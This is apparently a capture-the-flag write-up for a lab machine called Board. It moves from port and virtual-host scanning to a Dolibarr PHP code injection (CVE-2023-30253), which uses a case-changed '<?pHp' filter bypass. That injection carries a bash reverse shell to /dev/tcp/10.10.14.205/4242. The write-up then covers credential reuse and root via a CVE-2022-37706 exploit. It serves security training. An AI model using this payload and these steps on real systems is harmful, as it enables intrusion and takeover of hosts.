-
I start with a scan of the open ports,
nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.11 -oG scan
-
Scanning open ports.
nmap -p22,80 -sCV 10.10.11.11 -oN ports
-
I look at what technologies they are using on the website. I found a path with this acknowledgement and added it to the /etc/hosts file
whatweb http://10.10.11.11
-
After searching for a while through the site and the routes discovered with gobuster I can’t find anything relevant. When searching for virtual host I find one, crm
wfuzz -c -t 200 --hh=15949 -w /usr/share/amass/wordlist/subdomains-top1mil-110000.txt -H "Host: FUZZ.board.htb" http://board.htb
-
I add it to the /etc/hosts file and enter the site
-
I search for the default credentials admin:admin and get access.
-
When looking for vulnerabilities of this version I find the CVE-2023-30253 that consists in creating a website and a page to which we can add php code. This has a validation that does not allow us to introduce the string “php” but when we put it in the following way if it allows us.
Security Advisory: Dolibarr 17.0.0 PHP Code Injection (CVE-2023-30253) - Swascan
-
We add a piece of code to create a reverse shell and we enter to see the page that we have just created to execute our code.
<?pHp
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.205/4242 0>&1'");
?>
-
I start listening on port 4242 and I get a shell
-
I search the Dolibarr configuration file and find some mysql credentials.
-
I try to reuse the password found with the user larissa that I find by looking at the /etc/passwd file.
-
Searching for suid permissions I find some unusual files and running leanpeas confirms my suspicions. The enlightenment files with versions prior to 0.25.4 have a vulnerability listed in CVE-2022-37706.
find / -perm -4000 2>/dev/null
-
I find a POC of this CVE and by executing it I manage to escalate my privileges and become root
CVE-2022-37706-LPE-exploit
